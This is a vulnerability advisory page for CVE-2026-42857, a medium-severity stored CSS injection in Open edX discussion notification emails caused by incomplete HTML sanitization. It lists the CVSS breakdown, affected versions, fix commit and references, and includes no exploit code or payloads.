CVE-2026-42857

MEDIUM 4.6

Open edX Platform: Stored CSS Injection in Email Notifications via Incomplete HTML Sanitization

CVSS Score

4.6

EPSS Score

0.0%

EPSS Percentile

0th

Open edX Platform enables the authoring and delivery of online learning at any scale. The HTML sanitizer clean_thread_html_body() used for discussion notification emails fails to remove <style> tags from user-generated discussion post content. This content is rendered with Django's |safe template filter in email notification templates, allowing any enrolled student to inject arbitrary CSS into email notifications sent to other users. This enables email tracking (IP address disclosure), content spoofing, and phishing attacks. This vulnerability is fixed with commit cddc25cd791bb78f76833896e4778f668861df12.

CWE	CWE-79
Vendor	openedx
Product	openedx-platform
Published	May 11, 2026
Last Updated	May 13, 2026

Stay Ahead of the Next One

Get instant alerts for openedx openedx-platform

Be the first to know when new medium vulnerabilities affecting openedx openedx-platform are published — delivered to Slack, Telegram or Discord.

Get Free Alerts → Free · No credit card · 60 sec setup

CVSS v3 Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

Required

Scope

Unchanged

Confidentiality

Low

Integrity

Low

Availability

None

Affected Versions

openedx / openedx-platform

< cddc25cd791bb78f76833896e4778f668861df12 >= sumac, < ulmo

References

NVD ↗ CVE.org ↗ EPSS Data ↗

github.com: https://github.com/openedx/openedx-platform/security/advisories/GHSA-4xv3-5j4x-q8g4 github.com: https://github.com/openedx/openedx-platform/commit/cddc25cd791bb78f76833896e4778f668861df12